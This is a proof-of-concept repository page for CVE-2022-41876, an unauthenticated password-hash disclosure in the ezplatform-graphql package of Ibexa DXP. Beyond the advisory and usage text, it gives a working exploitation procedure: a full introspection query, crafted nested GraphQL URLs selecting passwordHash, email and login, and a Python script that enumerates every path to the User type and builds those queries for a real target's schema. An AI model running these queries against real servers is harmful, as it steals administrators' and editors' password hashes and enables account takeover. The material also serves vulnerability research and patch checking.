CVE-2022-41876 PoC — ezplatform-graphql GraphQL queries can expose password hashes

Associated vulnerability

Title: ezplatform-graphql GraphQL queries can expose password hashes (CVE-2022-41876)

Description: ezplatform-graphql is a GraphQL server implementation for Ibexa DXP and Ibexa Open Source. Versions prior to 2.3.12 and 1.0.13 are subject to Insecure Storage of Sensitive Information. Unauthenticated GraphQL queries for user accounts can expose the password hashes of users that have created or modified content, typically administrators and editors. This issue has been patched in version 2.3.12, and in 1.0.13 on the 1.x branch. Users unable to upgrade can remove the "passwordHash" entry from "src/bundle/Resources/config/graphql/User.types.yaml" in the GraphQL package, and optionally other properties such as the hash type, email and login.

Repository description: PoC for CVE-2022-41876

README
<div align="center">
  <img alt="ibexa logo" width="600" src="./logo/Ibexa_Logo.png">
  <br><br>
  <img alt="Python3.9" src="https://img.shields.io/badge/Python-3.9+-informational">
  <img alt="current version" src="https://img.shields.io/badge/linux-supported-success"><br>
  <a href="https://twitter.com/intent/follow?screen_name=Skilo" title="Follow"><img src="https://img.shields.io/twitter/follow/askilow?label=Skilo&style=social" alt="Twitter Skilo"></a>
  <a href="https://twitter.com/intent/follow?screen_name=TahiTi" title="Follow"><img src="https://img.shields.io/twitter/follow/0xTahiTi?label=TahiTi&style=social" alt="Twitter TahiTi"></a>
  <br><br>
</div>

# CVE-2022-41876 - eZ Platform user information disclosure

A vulnerability in eZ Platform / Ibexa DXP (the ezplatform-graphql package, versions before 2.3.12 and 1.0.13) lets an unauthenticated user read the password hash of every user who has created or modified content, typically administrators and editors.
This PoC enumerates every GraphQL path that leads to a `User` object, then queries each of those paths to retrieve the users' confidential fields (login, email, password hash, and so on).

## Usage

```
python3 cve-2022-41876.py -h
```
```
usage: cve-2022-41876.py [-h] [-t] [-f FILE] url

CVE-2022-41876 POC

positional arguments:
  url                   Target URL (specify the graphql endpoint)

optional arguments:
  -h, --help            show this help message and exit
  -t, --thread          Number of threads
  -f FILE, --file FILE  Local path to introspect file
```

## Results

![image](./example/poc.gif)

## How it works

The different steps followed by this tool to exploit the CVE are:

### Retrieving the introspection file

The first step is to obtain the server's schema as an `introspect.json` file, i.e. the result of a GraphQL introspection query.
If introspection is enabled, one way to retrieve it is to send the standard introspection query to the graphql endpoint as a GET request with the following payload (a POST with a JSON body `{"query": "..."}` carrying the same query works equally well):

```
https://<your-url>/graphql?query={__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name%20description%20locations%20args{...InputValue}}}}fragment%20FullType%20on%20__Type{kind%20name%20description%20fields(includeDeprecated:true){name%20description%20args{...InputValue}type{...TypeRef}isDeprecated%20deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name%20description%20isDeprecated%20deprecationReason}possibleTypes{...TypeRef}}fragment%20InputValue%20on%20__InputValue{name%20description%20type{...TypeRef}defaultValue}fragment%20TypeRef%20on%20__Type{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name}}}}}}}}
```

### Finding paths to User objects

The JSON returned by the server can then be fed to [graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum) to extract every path from the query root to the `User` type, like this:

![image](./example/graphql-enum.png)

### Requesting the found paths to get users' data

Finally, for each path found, a query must be crafted in the following form and sent to the server:
```
https://<your-url>/graphql?query={element1{element2{element3{...{id,name,login,passwordHash,email,enabled,maxLogin}}}}}
```
Where each element is one of the names shown between the brackets in the graphql-path-enum output, and the innermost selection lists the `User` fields to read _(note that one query must be sent per path)_.

So, with the graphql-path-enum example above, the first payload would be:
```
https://<your-url>/graphql?query={_repository{location{contentInfo{contentType{creator{id,name,login,passwordHash,email,enabled,maxLogin}}}}}}
```

If the server is vulnerable, it responds to each such query with a JSON document containing the users' data, including the `passwordHash` field. A server where that field has been removed from the `User` type (the workaround given in the advisory) rejects the query with a validation error for the unknown field instead, which is a quick way to tell a patched instance from a vulnerable one.
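The two middle steps of the procedure (finding paths to `User` in the introspection result, then turning each path into a nested query) are small enough to reimplement directly. The block below is an added example, not the PoC's own `cve-2022-41876.py` nor the graphql-path-enum tool; it runs offline against a constructed introspection fragment whose type and field names are illustrative rather than copied from a live Ibexa schema. It also shows how to URL-encode the finished query for the GET form used above.

```python
"""Enumerate GraphQL paths to a target type and build the nested queries.

Added example (not code from the PoC repository). `SCHEMA` is a constructed
subset of the `data.__schema` object that the introspection query returns,
with the same shape (kind / name / ofType wrappers) as a real server's answer.
"""
from collections import deque
from urllib.parse import urlencode

# Constructed introspection fragment: only the pieces needed for path discovery.
SCHEMA = {
    "queryType": {"name": "Query"},
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "_repository", "type": {"kind": "OBJECT", "name": "Repository", "ofType": None}},
            {"name": "version", "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
        ]},
        {"kind": "OBJECT", "name": "Repository", "fields": [
            {"name": "location", "type": {"kind": "OBJECT", "name": "Location", "ofType": None}},
            # [User!] : LIST wrapping NON_NULL wrapping the named type
            {"name": "users", "type": {"kind": "LIST", "name": None, "ofType": {
                "kind": "NON_NULL", "name": None,
                "ofType": {"kind": "OBJECT", "name": "User", "ofType": None}}}},
        ]},
        {"kind": "OBJECT", "name": "Location", "fields": [
            {"name": "contentInfo", "type": {"kind": "OBJECT", "name": "ContentInfo", "ofType": None}},
            {"name": "parent", "type": {"kind": "OBJECT", "name": "Location", "ofType": None}},  # cycle
        ]},
        {"kind": "OBJECT", "name": "ContentInfo", "fields": [
            {"name": "owner", "type": {"kind": "OBJECT", "name": "User", "ofType": None}},
            {"name": "contentType", "type": {"kind": "OBJECT", "name": "ContentType", "ofType": None}},
        ]},
        {"kind": "OBJECT", "name": "ContentType", "fields": [
            {"name": "creator", "type": {"kind": "OBJECT", "name": "User", "ofType": None}},
        ]},
        {"kind": "OBJECT", "name": "User", "fields": [
            {"name": "login", "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
            {"name": "passwordHash", "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
        ]},
    ],
}

# The selection set the README sends on every path.
USER_FIELDS = ["id", "name", "login", "passwordHash", "email", "enabled", "maxLogin"]


def unwrap(type_ref):
    """Strip LIST / NON_NULL wrappers and return the underlying named type."""
    while type_ref.get("ofType"):
        type_ref = type_ref["ofType"]
    return type_ref["name"]


def find_paths(schema, target, max_depth=6):
    """Return every field path from the query root to type `target`.

    Breadth-first search over OBJECT/INTERFACE fields. A type already on the
    current path is not re-entered, so cycles such as Location.parent -> Location
    terminate; `max_depth` bounds the search on large schemas.
    """
    types = {t["name"]: t for t in schema["types"]}
    root = schema["queryType"]["name"]
    paths = []
    queue = deque([(root, [], {root})])
    while queue:
        type_name, path, seen = queue.popleft()
        if len(path) >= max_depth:
            continue
        for field in types.get(type_name, {}).get("fields") or []:
            child = unwrap(field["type"])
            new_path = path + [field["name"]]
            if child == target:
                paths.append(new_path)
            elif (child in types and child not in seen
                  and types[child]["kind"] in ("OBJECT", "INTERFACE")):
                queue.append((child, new_path, seen | {child}))
    return paths


def build_query(path, fields=USER_FIELDS):
    """Turn ['_repository', 'location', ...] into the nested query string."""
    body = "{" + ",".join(fields) + "}"
    for name in reversed(path):
        body = "{" + name + body + "}"
    return body


def to_get_url(endpoint, query):
    """Percent-encode the query for the GET form used in the README."""
    return endpoint + "?" + urlencode({"query": query})


if __name__ == "__main__":
    for p in find_paths(SCHEMA, "User"):
        print(to_get_url("https://example.invalid/graphql", build_query(p)))
```

Running it prints one URL per discovered path, the last of which is the `_repository{location{contentInfo{contentType{creator{...}}}}}` shape shown above. Against a real target, replace `SCHEMA` with the parsed `introspect.json` and send each query; a server that still exposes `passwordHash` returns the hashes in `data`, while one that has dropped the field returns a validation error in `errors`.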

## References

[Hacktricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql)

[graphql-enum-path](https://gitlab.com/dee-see/graphql-path-enum)

## Credits

This PoC was created by [@Skilo](https://github.com/Skileau) and [@TahiTi](https://github.com/TahiTi)
File snapshot

```
/data/pocs/2139d8a1d8864ee547079734d011d43fa6ee0e49
├── [7.7K] cve-2022-41876.py
├── [4.0K] example
│   ├── [145K] graphql-enum.png
│   └── [115K] poc.gif
├── [1.0K] LICENSE
├── [4.0K] logo
│   └── [ 55K] Ibexa_Logo.png
├── [3.8K] README.md
└── [ 19] requirements.txt

2 directories, 7 files
```